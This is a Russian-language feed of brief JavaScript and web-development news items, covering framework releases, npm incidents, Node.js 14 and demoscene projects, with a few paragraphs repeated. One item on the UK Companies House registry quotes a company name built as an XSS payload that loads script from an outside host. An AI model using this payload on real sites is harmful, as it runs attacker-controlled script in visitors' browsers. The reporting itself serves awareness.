Мажорный MeteorJS 2.0: HMR, Cloud и другое
3 мин
Команда MeteorJS выпустила новую версию фреймворка 2.0, а вместе с ним новую платформу Meteor Cloud.
Вышла версия 1.0 библиотеки для управления секс-игрушками Buttplug
1 мин
После 3,5 лет разработки компания Nonpolynomial обновила открытую библиотеку для секс-игрушек до версии 1.0. Библиотека управляет вибрацией с клавиатур, геймпадов и шлемов виртуальной реальности, а также синхронизирует импульсы с фильмами через плагины для VLC и Kodi.
Cloudflare представила сервис Pages для статических сайтов JAMstack
2 мин
Компания Cloudflare анонсировала продукт Cloudflare Pages. Сервис помогает разработчикам создавать сайты с использованием подхода JAMstack.
Fwdays'20: Node.js Middleware – никогда больше
1 мин
В конце сентября в онлайне прошла конференция JavaScript Fwdays'20 Autumn, на которой я сделал доклад про проблемы мидлваров. После доклада меня почти каждый день просят ссылку на видео. И вот, наконец, его выложили в открытый доступ. Доклад чуть больше часа.
Google Chrome начнет блокировать JavaScript-редирект по кликам на ссылки
1 мин
В Google Chrome появится новая функция безопасности при переходе по ссылкам, которые открывают URL-адреса в новом окне или вкладке. Она будет блокировать попытки использовать JavaScript для перенаправления пользователя на вредоносную страницу.
В британском реестре компаний обнаружили XSS
2 мин
Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru
20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке.
Уокер обнаружил, что 16 октября некий Майкл Джон Тэнди зарегистрировал компанию с названием
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript.
RevolveR Contents Management Framework v.1.9.4.9
4 мин
Recovery Mode
Лет 10 назад мне нужна была какая-то система, чтобы вести блог о web-разработке и я использовал сильно хакнутый Drupal, который со временем стало невозможно обновить из-за груды костылей и постоянной нужде рыться под капотом после каждого update.
За 10 лет накопилось порядка 300 статей по верстке и front-end программированию, а также куча полезных сниппетов кода, которые я в последующем использовал для создания RevolveR Contents Management Framework на фирменной архитектуре KMV(Kernel<-Model<-View).
За 10 лет накопилось порядка 300 статей по верстке и front-end программированию, а также куча полезных сниппетов кода, которые я в последующем использовал для создания RevolveR Contents Management Framework на фирменной архитектуре KMV(Kernel<-Model<-View).
Из каталога NPM удалили четыре зловредных пакета
2 мин
В четверг, 16 октября, команда безопасности npm удалила с портала четыре пакета JavaScript, содержащие вредоносный код.
Демка MONOSPACE, победитель Assembly ONLINE 2020, умещается в 1021 байт
3 мин
Первое место в соревновании разработчиков Assembly ONLINE 2020 в категории «Online 1k intro» заняла демка MONOSPACE. Программа размером в 1021 байт после сжатия написана на JavaScript. Автор демки — креативный кодер и демосценер-оптимизатор Mathieu 'p01' Henri.
24 октября приглашаем на онлайн-митап Hot Frontend в Казани
1 мин
Всем привет! Приглашаем разобрать «горячие» вопросы Frontend-разработки на новом онлайн-митапе. Эксперты представят несколько кейсов из практики и ответят на вопросы слушателей. За самые интересные вопросы мы, как всегда, вручим полезные подарки. Ждем вас 24 октября, участие бесплатное.
Разработчик создал из Mac OS 8 приложение для современных ПК на macOS, Windows и Linux
1 мин
Разработчик из компании Slack Феликс Ризеберг (Felix Rieseberg) портировал Mac OS 8.1 с Macintosh Quadra 1991 года с процессором Motorola на современную компьютерную архитектуру с помощью JavaScript. Этот проект он назвал macintosh.js и опубликовал на GitHub для всех энтузиастов и ценителей IT-истории, чтобы они могли просто поностальгировать.
Barclays Bank уличили в использовании «Архива Интернета» в качестве CDN
2 мин
Barclays Bank использовал цифровой архив World Wide Web, основанный «Архивом Интернета», в качестве сети доставки содержимого.
Программист создал аналог Club Penguin, где можно одновременно общаться как в Zoom и играть
2 мин
Full stack разработчик и основатель PushLabs Люк Барвиковски (Luke Barwikowski) рассказал пользователям Reddit о том, над чем он работал последние несколько месяцев. Барвиковски создал Banger.Digital party — это аналог Club Penguin для взрослых пользователей, где они могут одновременно общаться по видеосвязи и играть — управлять своими фигурками-аватарками, выполняя различные действия в виртуальном мире.
Ближайшие события
Apple выпустила для разработчиков проект с открытым исходным кодом Password Manager Resources
2 мин
5 июня 2020 года Apple сообщила, что опубликовала на GitHub новый проект с открытым исходным кодом — Password Manager Resources. Он предназначен для того, чтобы облегчить разработчикам создания надежных паролей, совместимых с популярными веб-сайтами.
Apple использует собственную платформу Apple iCloud Keychain, чтобы генерировать надежные пароли во время создания учетной записи или при смене пароля пользователей. Новый проект с открытым исходным кодом Password Manager Resources направлен на то, чтобы распространить возможности этой платформы на другие приложения для менеджеров паролей, которые делают сторонние разработчики. Проект Password Manager Resources опубликован под свободной лицензией MIT.
Документация Webix на русском языке
1 мин
Важная новость для русскоязычных пользователей библиотеки Webix JavaScript UI.
Сегодня команда Webix опубликовала полную версию всей технической документации на Русском языке.
Vue 3. Что нового?
2 мин
Многие из нас ждут выхода Vue 3 и похоже, что он почти здесь (релиз запланирован на второй квартал 2020 года) и уже есть возможность взглянуть или даже поэкспериментировать с бета-версией.
Ещё один однострочный пакет npm сломал экосистему JavaScript
4 мин
В субботу обновление маленькой библиотеки is-promise вызвало переполох в значительной части экосистемы JavaScript. Зависимости от сломанной библиотеки встроены в 3,4 миллиона проектов. Это уже второй раз, когда крошечный проект JavaScript вызывает проблемы такого масштаба.
Библиотека is-promise состоит из двух строк кода, а разработчики могут использовать её в своих проектах с помощью однострочного вызова.
Предназначение библиотеки состоит в проверке, что JavaScript-объект является типом Promise, то есть представляет собой конечное завершение асинхронной операции и её результирующее значение.
Библиотека is-promise состоит из двух строк кода, а разработчики могут использовать её в своих проектах с помощью однострочного вызова.
declare function isPromise<T, S>(obj: Promise<T> | S): obj is Promise<T>;
export default isPromise;Предназначение библиотеки состоит в проверке, что JavaScript-объект является типом Promise, то есть представляет собой конечное завершение асинхронной операции и её результирующее значение.
Встречайте Node.js 14.0.0
1 мин
Вышла версия Node.js 14.0.0. Эта версия будет жить долго, до апреля 2023 года, и сейчас в ней еще не появилось всех ожидаемых нами новшеств. Они будут постепенно появляться летом, а 19 октября 14 версия станет LTS.
GitHub купил npm
1 мин
Пакетный менеджер npm становится частью GitHub. Объявления об этом появились и в блоге GitHub, и в блоге npm.
В блоге npm основатель проекта Айзек Шлютер подчёркивает «npm, который вы знаете, никуда не девается». Он выражает уверенность, что для проекта это перемена к лучшему, и сообщает, что сам продолжит работать над ним.
Алгоритм Real-Time-Person-Removal при помощи библиотеки Tensorflow.js удаляет людей из видео в реальном времени
2 мин
Веб-разработчик, программист, технический консультант и аналитик с творческим подходом Джейсон Мэйс (Jason Mayes) создал и выложил на GitHub свой алгоритм, разработанный с помощью библиотеки TensorFlow.js и JavaScript. С его помощью Джейсон смог научить нейросеть анализировать контур человека, а потом убирать его фигуру из видеопотока в режиме реального времени, например, при трансляции с веб-камеры в браузере, оставляя и дополняя в случае необходимости в кадре только объекты на заднем плане. Особенно интересно смотреть на то, как человек прошелся по какой-то мягкой поверхности, но его нет на видео, а следы появились.